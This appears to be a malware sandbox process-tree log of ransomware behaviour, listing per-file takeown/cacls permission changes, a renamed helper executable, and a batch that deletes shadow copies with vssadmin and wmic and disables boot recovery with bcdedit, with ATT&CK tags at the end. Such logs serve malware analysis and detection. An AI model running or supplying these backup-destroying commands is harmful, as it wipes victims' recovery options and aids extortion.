C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui""2⤵PID:1476
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui" /E /G Admin:F /C3⤵PID:888
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui"3⤵PID:1212
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "PhotoViewer.dll.mui" -nobanner3⤵PID:712
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "PhotoViewer.dll.mui" -nobanner4⤵PID:1376
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:204
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini""2⤵PID:1480
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini" /E /G Admin:F /C3⤵PID:1548
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini"3⤵PID:1836
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "eula.ini" -nobanner3⤵PID:1408
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "eula.ini" -nobanner4⤵PID:1976
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1676
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png""2⤵PID:1144
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png" /E /G Admin:F /C3⤵PID:1744
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png"3⤵PID:1656
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "device.png" -nobanner3⤵PID:1516
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "device.png" -nobanner4⤵PID:1076
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:108
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Users\All Users\Microsoft\Network\Downloader\qmgr0.dat""2⤵PID:1120
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Network\Downloader\qmgr0.dat" /E /G Admin:F /C3⤵PID:888
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Network\Downloader\qmgr0.dat"3⤵PID:1212
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "qmgr0.dat" -nobanner3⤵PID:2016
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "qmgr0.dat" -nobanner4⤵PID:1376
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1956
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\br.gif""2⤵PID:1476
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\br.gif" /E /G Admin:F /C3⤵PID:896
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\br.gif"3⤵PID:1836
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "br.gif" -nobanner3⤵PID:1152
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "br.gif" -nobanner4⤵PID:1976
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:972
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif""2⤵PID:1652
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif" /E /G Admin:F /C3⤵PID:1816
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif"3⤵
- Modifies file permissions
PID:1740
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "forms_distributed.gif" -nobanner3⤵PID:212
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "forms_distributed.gif" -nobanner4⤵PID:112
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1560
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif""2⤵PID:856
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif" /E /G Admin:F /C3⤵PID:1688
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif"3⤵
- Modifies file permissions
PID:1512
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "pdf.gif" -nobanner3⤵PID:1792
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "pdf.gif" -nobanner4⤵PID:1068
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:204
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif""2⤵PID:224
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif" /E /G Admin:F /C3⤵PID:1832
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif"3⤵PID:1284
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "review_same_reviewers.gif" -nobanner3⤵PID:532
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "review_same_reviewers.gif" -nobanner4⤵PID:2032
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:316
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\submission_history.gif""2⤵PID:1500
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\submission_history.gif" /E /G Admin:F /C3⤵PID:948
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\submission_history.gif"3⤵PID:1996
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "submission_history.gif" -nobanner3⤵PID:1504
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "submission_history.gif" -nobanner4⤵PID:1516
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1624
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInTray.gif""2⤵PID:1372
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInTray.gif" /E /G Admin:F /C3⤵PID:620
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInTray.gif"3⤵PID:1212
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "turnOnNotificationInTray.gif" -nobanner3⤵PID:712
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "turnOnNotificationInTray.gif" -nobanner4⤵PID:2016
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1956
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf""2⤵PID:1052
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf" /E /G Admin:F /C3⤵PID:1548
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf"3⤵
- Modifies file permissions
PID:1836
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "CourierStd-BoldOblique.otf" -nobanner3⤵PID:1408
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "CourierStd-BoldOblique.otf" -nobanner4⤵PID:1152
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1480
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Bold.otf""2⤵PID:1120
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Bold.otf" /E /G Admin:F /C3⤵PID:1744
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Bold.otf"3⤵
- Modifies file permissions
PID:1740
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "MyriadPro-Bold.otf" -nobanner3⤵PID:1860
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "MyriadPro-Bold.otf" -nobanner4⤵PID:212
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:960
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\SY______.PFB""2⤵PID:1040
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\SY______.PFB" /E /G Admin:F /C3⤵PID:1872
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\SY______.PFB"3⤵
- Modifies file permissions
PID:1512
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "SY______.PFB" -nobanner3⤵PID:1112
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "SY______.PFB" -nobanner4⤵PID:1792
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1008
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt""2⤵PID:1144
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt" /E /G Admin:F /C3⤵PID:896
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt"3⤵PID:1284
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "DisplayLanguageNames.en_US.txt" -nobanner3⤵PID:1276
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "DisplayLanguageNames.en_US.txt" -nobanner4⤵PID:1092
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1808
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.fca""2⤵PID:1364
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.fca" /E /G Admin:F /C3⤵PID:228
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.fca"3⤵PID:1996
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "can.fca" -nobanner3⤵PID:1800
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "can.fca" -nobanner4⤵PID:1504
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1980
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env""2⤵PID:224
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env" /E /G Admin:F /C3⤵PID:888
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env"3⤵PID:1212
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "engphon.env" -nobanner3⤵PID:1068
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "engphon.env" -nobanner4⤵PID:712
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:204
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt""2⤵PID:608
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt" /E /G Admin:F /C3⤵PID:820
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt"3⤵PID:896
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "symbol.txt" -nobanner3⤵PID:1284
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "symbol.txt" -nobanner4⤵PID:1408
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1276
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT""2⤵PID:856
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT" /E /G Admin:F /C3⤵PID:1128
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT"3⤵PID:228
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "ICELAND.TXT" -nobanner3⤵PID:1996
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "ICELAND.TXT" -nobanner4⤵PID:112
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1800
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT""2⤵PID:1980
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT" /E /G Admin:F /C3⤵PID:1624
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT"3⤵PID:888
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "CP1251.TXT" -nobanner3⤵PID:1212
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "CP1251.TXT" -nobanner4⤵PID:216
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1068
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exe""2⤵PID:776
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exe" /E /G Admin:F /C3⤵PID:1348
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exe"3⤵
- Modifies file permissions
PID:820
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "GoogleUpdateSetup.exe" -nobanner3⤵PID:896
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "GoogleUpdateSetup.exe" -nobanner4⤵PID:1092
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2032
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui""2⤵PID:1276
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui" /E /G Admin:F /C3⤵PID:616
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui"3⤵
- Modifies file permissions
PID:1128
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "PhotoAcq.dll.mui" -nobanner3⤵PID:212
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "PhotoAcq.dll.mui" -nobanner4⤵PID:1516
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1984
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png""2⤵PID:1652
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png" /E /G Admin:F /C3⤵PID:1872
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png"3⤵PID:900
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "background.png" -nobanner3⤵PID:796
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "background.png" -nobanner4⤵PID:1112
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1956
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png""2⤵PID:220
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png" /E /G Admin:F /C3⤵PID:524
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png"3⤵
- Modifies file permissions
PID:1868
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "watermark.png" -nobanner3⤵PID:236
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "watermark.png" -nobanner4⤵PID:1092
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1676
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {64E3996C-4D79-4B84-8A75-0AA5AB3F5330} S-1-5-21-403932158-3302036622-1224131197-1000:ELJKIHEZ\Admin:Interactive:[1]1⤵PID:1488
-
C:\Windows\SYSTEM32\cmd.exeC:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\K8EwiAat.bat"2⤵PID:1584
-
C:\Windows\system32\vssadmin.exevssadmin Delete Shadows /All /Quiet3⤵
- Interacts with shadow copies
PID:1500
-
-
C:\Windows\System32\Wbem\WMIC.exewmic SHADOWCOPY DELETE3⤵
- Suspicious use of AdjustPrivilegeToken
PID:568
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:1516
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy ignoreallfailures3⤵
- Modifies boot configuration data using bcdedit
PID:1868
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Delete /TN DSHCA /F3⤵PID:1112
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:1056
Network
MITRE ATT&CK Enterprise v6
Persistence
Modify Existing Service
1Registry Run Keys / Startup Folder
1Scheduled Task
1Defense Evasion
File Deletion
2File and Directory Permissions Modification
1Modify Registry
3